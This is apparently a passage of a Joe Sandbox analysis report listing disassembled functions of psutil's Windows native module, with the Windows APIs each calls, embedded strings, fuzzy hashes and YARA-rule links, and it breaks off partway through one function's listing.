NtQuerySystemInformation(SystemProcessorPerformanceInformation), xrefs: 00007FFB9DD6200D
GetSystemInfo() failed to retrieve CPU count, xrefs: 00007FFB9DD61FB4

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: DeallocErr_FromList_Windowsfree
String ID: (ddddd)$GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$NtQuerySystemInformation(SystemProcessorPerformanceInformation)$psutil-debug [%s:%d]> $psutil/arch/windows\cpu.c
API String ID: 2064544276-4027580629
Opcode ID: 3aba73f1beacce3b45a693e18e4e7de515b957251446303ddff290eb5a7b73cd
Instruction ID: 2f6c742223f405658dec5f539edb1b6818393cc663d19b5a8b414e024df7df36
Opcode Fuzzy Hash: 3aba73f1beacce3b45a693e18e4e7de515b957251446303ddff290eb5a7b73cd
Instruction Fuzzy Hash: CE71B971B18F428AE6369F37D450279A365AF5DB80B445332E98F62750FF3CE4458740

Function 00007FFB9DD67E20 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FFB9DD67E57
OpenProcessToken.ADVAPI32 ref: 00007FFB9DD67E6B
GetLastError.KERNEL32 ref: 00007FFB9DD67E79
ImpersonateSelf.ADVAPI32 ref: 00007FFB9DD67E89
OpenProcessToken.ADVAPI32 ref: 00007FFB9DD67EB6

Part of subcall function 00007FFB9DD61070: GetLastError.KERNEL32 ref: 00007FFB9DD61092
Part of subcall function 00007FFB9DD61070: PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD610B5

Part of subcall function 00007FFB9DD67D80: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD67D92
Part of subcall function 00007FFB9DD67D80: fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD67DAF
Part of subcall function 00007FFB9DD67D80: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD67DB9
Part of subcall function 00007FFB9DD67D80: fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD67DC9
Part of subcall function 00007FFB9DD67D80: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD67DD3
Part of subcall function 00007FFB9DD67D80: fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD67DE3
Part of subcall function 00007FFB9DD67D80: GetLastError.KERNEL32 ref: 00007FFB9DD67DE8
Part of subcall function 00007FFB9DD67D80: PyErr_WarnEx.PYTHON3 ref: 00007FFB9DD67E0A

GetLastError.KERNEL32 ref: 00007FFB9DD67ED6
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD67EFD

Strings

LookupPrivilegeValue, xrefs: 00007FFB9DD67F47
AdjustTokenPrivileges, xrefs: 00007FFB9DD67FBD, 00007FFB9DD68024
SeDebugPrivilege, xrefs: 00007FFB9DD67F2E
ImpersonateSelf, xrefs: 00007FFB9DD67E93
OpenProcessToken, xrefs: 00007FFB9DD67EC0, 00007FFB9DD67EDC
(originated from %s), xrefs: 00007FFB9DD67EE5, 00007FFB9DD67F50, 00007FFB9DD67FC6

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: ErrorLast$Err_Process__acrt_iob_funcfprintf$FilenameFromOpenTokenWindowsWith$CurrentImpersonateSelfWarn
String ID: (originated from %s)$AdjustTokenPrivileges$ImpersonateSelf$LookupPrivilegeValue$OpenProcessToken$SeDebugPrivilege
API String ID: 2544101647-3705996988
Opcode ID: 7e459fa033e77e746eff1f6157e4fc365d5f228a077588dde54361fef94116c4
Instruction ID: 1a207646861f597956ab023fdec62c2691d1722f4de40106ca8b1d7550ef8764
Opcode Fuzzy Hash: 7e459fa033e77e746eff1f6157e4fc365d5f228a077588dde54361fef94116c4
Instruction Fuzzy Hash: A4512FA5B5CA8692E7709B72E4402A97764FF48784FC02036D6CD42669FF3DE549C780

Function 00007FFB9DD613D0 Relevance: 89.5, APIs: 27, Strings: 24, Instructions: 229
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyEval_SaveThread.PYTHON3 ref: 00007FFB9DD613DA
LoadLibraryA.KERNEL32 ref: 00007FFB9DD613EA
PyEval_RestoreThread.PYTHON3 ref: 00007FFB9DD613F6
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD6140A
GetProcAddress.KERNEL32 ref: 00007FFB9DD6141C
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD61430
FreeLibrary.KERNEL32 ref: 00007FFB9DD61439
GetModuleHandleA.KERNEL32 ref: 00007FFB9DD61466
GetProcAddress.KERNEL32 ref: 00007FFB9DD61484
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD61498
GetModuleHandleA.KERNEL32 ref: 00007FFB9DD614C5
GetProcAddress.KERNEL32 ref: 00007FFB9DD614E3
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD614F7
PyEval_SaveThread.PYTHON3 ref: 00007FFB9DD6151D
LoadLibraryA.KERNEL32 ref: 00007FFB9DD6152D
PyEval_RestoreThread.PYTHON3 ref: 00007FFB9DD61539
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD6154D
GetProcAddress.KERNEL32 ref: 00007FFB9DD61574
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD61588
FreeLibrary.KERNEL32 ref: 00007FFB9DD61591

Strings

WTSFreeMemory, xrefs: 00007FFB9DD617E0
WTSQuerySessionInformationW, xrefs: 00007FFB9DD617C6
ntdll, xrefs: 00007FFB9DD6164A, 00007FFB9DD6166D, 00007FFB9DD61690, 00007FFB9DD616B3
WTSEnumerateSessionsW, xrefs: 00007FFB9DD617AC
NtQueryVirtualMemory, xrefs: 00007FFB9DD61689
NtResumeProcess, xrefs: 00007FFB9DD61666
iphlpapi.dll, xrefs: 00007FFB9DD615E1, 00007FFB9DD61604
NtQueryInformationProcess, xrefs: 00007FFB9DD6147A, 00007FFB9DD6148F
GetExtendedUdpTable, xrefs: 00007FFB9DD615FD
GetTickCount64, xrefs: 00007FFB9DD616EA, 00007FFB9DD616FF
RtlGetVersion, xrefs: 00007FFB9DD61620
GetLogicalProcessorInformationEx, xrefs: 00007FFB9DD61792
NtQueryObject, xrefs: 00007FFB9DD6156A, 00007FFB9DD6157F
NtSuspendProcess, xrefs: 00007FFB9DD61643
GetActiveProcessorCount, xrefs: 00007FFB9DD6176C, 00007FFB9DD61781
RtlNtStatusToDosErrorNoTeb, xrefs: 00007FFB9DD616AC
wtsapi32.dll, xrefs: 00007FFB9DD617BA, 00007FFB9DD617D4, 00007FFB9DD617EE
RtlIpv4AddressToStringA, xrefs: 00007FFB9DD615B0
NtSetInformationProcess, xrefs: 00007FFB9DD614D9, 00007FFB9DD614EE
GetExtendedTcpTable, xrefs: 00007FFB9DD615DA
RtlIpv6AddressToStringA, xrefs: 00007FFB9DD61727
kernel32, xrefs: 00007FFB9DD616CF, 00007FFB9DD616E1, 00007FFB9DD61751, 00007FFB9DD61763, 00007FFB9DD617A0
NtQuerySystemInformation, xrefs: 00007FFB9DD61412, 00007FFB9DD61427
ntdll.dll, xrefs: 00007FFB9DD613E0, 00007FFB9DD61401, 00007FFB9DD61458, 00007FFB9DD61471, 00007FFB9DD614B7, 00007FFB9DD614D0, 00007FFB9DD61523, 00007FFB9DD61544, 00007FFB9DD615BE, 00007FFB9DD61627, 00007FFB9DD61735

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Err_FilenameFromWindowsWith$AddressEval_LibraryProcThread$FreeHandleLoadModuleRestoreSave
String ID: GetActiveProcessorCount$GetExtendedTcpTable$GetExtendedUdpTable$GetLogicalProcessorInformationEx$GetTickCount64$NtQueryInformationProcess$NtQueryObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtResumeProcess$NtSetInformationProcess$NtSuspendProcess$RtlGetVersion$RtlIpv4AddressToStringA$RtlIpv6AddressToStringA$RtlNtStatusToDosErrorNoTeb$WTSEnumerateSessionsW$WTSFreeMemory$WTSQuerySessionInformationW$iphlpapi.dll$kernel32$ntdll$ntdll.dll$wtsapi32.dll
API String ID: 3787047288-761253638
Opcode ID: 6b7c78cd98652e75907c508de1284e9f0e804c7fc3037098929c04c6a191e3dd
Instruction ID: bd211ec6a54c2222bde44be3ab9c8ae0637f13dece9b7b562c90d0c19dab056e
Opcode Fuzzy Hash: 6b7c78cd98652e75907c508de1284e9f0e804c7fc3037098929c04c6a191e3dd
Instruction Fuzzy Hash: E2C1AEE0B09F0790EAA49B76E99017923A5EF4C784FC67539C49D862A4FF6CF54983C0

Function 00007FFB9DD612C0 Relevance: 10.5, APIs: 7, Instructions: 37
librarythreadloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyEval_SaveThread.PYTHON3 ref: 00007FFB9DD612DA
LoadLibraryA.KERNEL32 ref: 00007FFB9DD612E6
PyEval_RestoreThread.PYTHON3 ref: 00007FFB9DD612F2
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD61302
GetProcAddress.KERNEL32 ref: 00007FFB9DD61310
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD61320
FreeLibrary.KERNEL32 ref: 00007FFB9DD61329

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Err_Eval_FilenameFromLibraryThreadWindowsWith$AddressFreeLoadProcRestoreSave
String ID:
API String ID: 568911590-0
Opcode ID: e2200b3415209b6f4be3470a672ca2eac9ae6c36c8dafb9bbec9a9066c3d2c4c
Instruction ID: 08d7c480e2c8a570ea629cbd0d6af18dfe5959b69401495764d726f26ba20fcd
Opcode Fuzzy Hash: e2200b3415209b6f4be3470a672ca2eac9ae6c36c8dafb9bbec9a9066c3d2c4c
Instruction Fuzzy Hash: B4011AA0B19E4685EA249B33F90813E63A5FF4CFC5B856034D98E07B68EE2CE0418280

Function 00007FFB9DD61DC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimes.KERNEL32 ref: 00007FFB9DD61DD3
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD61DDF
Py_BuildValue.PYTHON3 ref: 00007FFB9DD61E82

Strings

(ddd), xrefs: 00007FFB9DD61DF4

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: BuildErr_FromSystemTimesValueWindows
String ID: (ddd)
API String ID: 2325294781-2401937087
Opcode ID: ba0bdbf672466f0367906313a703a410643c45962e3f53d94245850bb14888e0
Instruction ID: a2f45b4bdce1c5824d37793843fa1531dab060e8df122e0a0d28164a3fa98e9b
Opcode Fuzzy Hash: ba0bdbf672466f0367906313a703a410643c45962e3f53d94245850bb14888e0
Instruction Fuzzy Hash: AB119A71F29E414FC563DB36D940915E3A5AFAD790B858322F54FB1E10F72CE0968B00

Function 00007FFB9DD63450 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetPerformanceInfo.KERNEL32 ref: 00007FFB9DD63473
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD6347F
Py_BuildValue.PYTHON3 ref: 00007FFB9DD634DD

Strings

(LLLL), xrefs: 00007FFB9DD634D6

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: BuildErr_FromInfoPerformanceValueWindows
String ID: (LLLL)
API String ID: 964912588-1895995636
Opcode ID: 86683727f7044af2f3d4400d4c57e5fdd07758044f8fb3ec7329105bd5e8c26a
Instruction ID: 3c920c8667724db1a62a6024ac1c88278406eef6f6d2b7b682170b7c8f555a36
Opcode Fuzzy Hash: 86683727f7044af2f3d4400d4c57e5fdd07758044f8fb3ec7329105bd5e8c26a
Instruction Fuzzy Hash: C7014465B18A8481EA64DB72F41236AB364FFDD740FC06036D9CD43765EE2CD104CB40

Non-executed Functions

Function 00007FFB9DD62E70 Relevance: 73.8, APIs: 38, Strings: 4, Instructions: 251
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.VCRUNTIME140 ref: 00007FFB9DD62EAF
PyList_New.PYTHON3 ref: 00007FFB9DD62EC0
SetErrorMode.KERNEL32 ref: 00007FFB9DD62EEF
PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD62F07
PyObject_IsTrue.PYTHON3 ref: 00007FFB9DD62F1A
PyEval_SaveThread.PYTHON3 ref: 00007FFB9DD62F23
GetLogicalDriveStringsA.KERNEL32 ref: 00007FFB9DD62F38
PyEval_RestoreThread.PYTHON3 ref: 00007FFB9DD62F43
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD62F4F
SetErrorMode.KERNEL32 ref: 00007FFB9DD62F58
PyEval_SaveThread.PYTHON3 ref: 00007FFB9DD62F90
GetDriveTypeA.KERNEL32 ref: 00007FFB9DD62F9C
PyEval_RestoreThread.PYTHON3 ref: 00007FFB9DD62FA8
strchr.VCRUNTIME140 ref: 00007FFB9DD63289
SetErrorMode.KERNEL32 ref: 00007FFB9DD632A0
SetErrorMode.KERNEL32 ref: 00007FFB9DD632B7
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632CB
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD632DA

Strings

,compressed, xrefs: 00007FFB9DD63073
,readonly, xrefs: 00007FFB9DD63096
A:\, xrefs: 00007FFB9DD62F73, 00007FFB9DD6318D
(ssss), xrefs: 00007FFB9DD63129, 00007FFB9DD63250

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: ErrorEval_ModeThread$DeallocDriveRestoreSave$Arg_Err_FromList_LogicalObject_ParseStringsTrueTupleTypeWindowsmemsetstrchr
String ID: (ssss)$,compressed$,readonly$A:\
API String ID: 1159295088-641188810
Opcode ID: f05961b23bf45abea38e3d347efde3a6e8441f966b98cf86d26a42af54087c04
Instruction ID: fb66c67e7df3fb84f5544e7161ae38355dcebf325c095de244c7f19bb96074a4
Opcode Fuzzy Hash: f05961b23bf45abea38e3d347efde3a6e8441f966b98cf86d26a42af54087c04
Instruction Fuzzy Hash: 86C170A1B08A8686EB30DF72E8046B963A4FF4DB54FC46135C99E46694FF3CE509C780

Function 00007FFB9DD62B00 Relevance: 59.7, APIs: 26, Strings: 8, Instructions: 184
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyDict_New.PYTHON3 ref: 00007FFB9DD62B1B
swprintf_s.MSPDB140-MSVCRT ref: 00007FFB9DD62B87

Part of subcall function 00007FFB9DD629D0: __stdio_common_vsprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD62A0F

CreateFileA.KERNEL32 ref: 00007FFB9DD62BAF
DeviceIoControl.KERNEL32 ref: 00007FFB9DD62BF5
GetLastError.KERNEL32 ref: 00007FFB9DD62C00
DeviceIoControl.KERNEL32 ref: 00007FFB9DD62C4A
swprintf_s.MSPDB140-MSVCRT ref: 00007FFB9DD62C6B
Py_BuildValue.PYTHON3(?,?), ref: 00007FFB9DD62CB4
PyDict_SetItemString.PYTHON3 ref: 00007FFB9DD62CD4
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD62CF1
CloseHandle.KERNEL32 ref: 00007FFB9DD62CFA
GetLastError.KERNEL32 ref: 00007FFB9DD62D58
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD62D6F
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD62D8C
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD62D96
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD62DA9
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD62DB3
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD62DC3
GetLastError.KERNEL32 ref: 00007FFB9DD62DCD
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD62DE8
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD62E05
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD62E0F
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD62E20
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD62E37
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD62E46
CloseHandle.KERNEL32 ref: 00007FFB9DD62E54

Strings

\\.\PhysicalDrive%d, xrefs: 00007FFB9DD62B73
psutil-debug [%s:%d]> , xrefs: 00007FFB9DD62D85, 00007FFB9DD62DFE
DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i, xrefs: 00007FFB9DD62D9C
psutil/arch/windows\disk.c, xrefs: 00007FFB9DD62D7B, 00007FFB9DD62DF4
(IILLKK), xrefs: 00007FFB9DD62C9B
PhysicalDrive%i, xrefs: 00007FFB9DD62C57
, xrefs: 00007FFB9DD62D02
DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i, xrefs: 00007FFB9DD62E15

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: __acrt_iob_func$fprintf$DeallocErrorLast$CloseControlDeviceDict_Handleswprintf_s$BuildCreateErr_FileFromItemStringValueWindows__stdio_common_vsprintf_s
String ID: $(IILLKK)$DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i$DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i$PhysicalDrive%i$\\.\PhysicalDrive%d$psutil-debug [%s:%d]> $psutil/arch/windows\disk.c
API String ID: 3661822457-4277503146
Opcode ID: b432df3f823cbfe8d6a75763a0cf0921735d2c52f549eb0bb12dc7f174602705
Instruction ID: 84eb35d422f72a132cc5ac07dfa20c8ff2c74618f010d510102cad515eac2f72
Opcode Fuzzy Hash: b432df3f823cbfe8d6a75763a0cf0921735d2c52f549eb0bb12dc7f174602705
Instruction Fuzzy Hash: E69121B1B08B8282E7309B26E4546A977A4FF49B90F802136D9CD43B65FF3CE545C780

Function 00007FFB9DD62480 Relevance: 56.2, APIs: 24, Strings: 8, Instructions: 247
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD624C9
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD624DF
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD624FC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD62504
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD62514
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD6251C
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD6252C
PyErr_SetString.PYTHON3 ref: 00007FFB9DD6254C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD62560
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD6256E
NtQuerySystemInformation.NTDLL ref: 00007FFB9DD62586
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD625A1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD625CE
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD625DE
NtQuerySystemInformation.NTDLL ref: 00007FFB9DD625F8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD62637
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD62645
NtQuerySystemInformation.NTDLL ref: 00007FFB9DD6265F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6267A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD62685
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD62809
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD62814
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6281D
Py_BuildValue.PYTHON3 ref: 00007FFB9DD62840

Strings

NtQuerySystemInformation(SystemPerformanceInformation), xrefs: 00007FFB9DD62590
psutil-debug [%s:%d]> , xrefs: 00007FFB9DD624F5
psutil/arch/windows\cpu.c, xrefs: 00007FFB9DD624EB
GetActiveProcessorCount() not available; using GetSystemInfo(), xrefs: 00007FFB9DD6250D
NtQuerySystemInformation(SystemProcessorPerformanceInformation), xrefs: 00007FFB9DD62669
NtQuerySystemInformation(SystemInterruptInformation), xrefs: 00007FFB9DD62602
GetSystemInfo() failed to retrieve CPU count, xrefs: 00007FFB9DD62542
kkkk, xrefs: 00007FFB9DD62829

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: free$Err_$InformationMemoryQuerySystem__acrt_iob_funcfprintfmalloc$BuildFromStringValueWindows
String ID: GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$NtQuerySystemInformation(SystemInterruptInformation)$NtQuerySystemInformation(SystemPerformanceInformation)$NtQuerySystemInformation(SystemProcessorPerformanceInformation)$kkkk$psutil-debug [%s:%d]> $psutil/arch/windows\cpu.c
API String ID: 1058843278-3097090287
Opcode ID: a320372d8f5e0e84fe72d2109c7aa1b9063dbd94d06811a1af5d855d0ca0114b
Instruction ID: 28b8e499455cfb499646e761e0d32ef7941a4096d7d05986c7f3efd0043e920d
Opcode Fuzzy Hash: a320372d8f5e0e84fe72d2109c7aa1b9063dbd94d06811a1af5d855d0ca0114b
Instruction Fuzzy Hash: 13B1D5B1B18A4286EB21DF36D4545B96760FF9DB88B806232DA8E52760FF3DF509C340

Function 00007FFB9DD66AE0 Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 229
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32 ref: 00007FFB9DD66B41
GetLastError.KERNEL32 ref: 00007FFB9DD66B4F

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

NtQueryInformationProcess.NTDLL ref: 00007FFB9DD66B9C
RtlNtStatusToDosErrorNoTeb.NTDLL ref: 00007FFB9DD66BBD
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD66BE2
CloseHandle.KERNEL32 ref: 00007FFB9DD66BEB
ReadProcessMemory.KERNEL32 ref: 00007FFB9DD66C1B
GetLastError.KERNEL32 ref: 00007FFB9DD66C25
CloseHandle.KERNEL32 ref: 00007FFB9DD66C35
ReadProcessMemory.KERNEL32 ref: 00007FFB9DD66C5A
VirtualQueryEx.KERNEL32 ref: 00007FFB9DD66D58
GetLastError.KERNEL32 ref: 00007FFB9DD66D63
PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD66D88
CloseHandle.KERNEL32 ref: 00007FFB9DD66D91
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD66DD1
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD66DDF
CloseHandle.KERNEL32 ref: 00007FFB9DD66DE8
ReadProcessMemory.KERNEL32 ref: 00007FFB9DD66E05
GetLastError.KERNEL32 ref: 00007FFB9DD66E0F
CloseHandle.KERNEL32 ref: 00007FFB9DD66E1F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD66E28
CloseHandle.KERNEL32 ref: 00007FFB9DD66E38

Strings

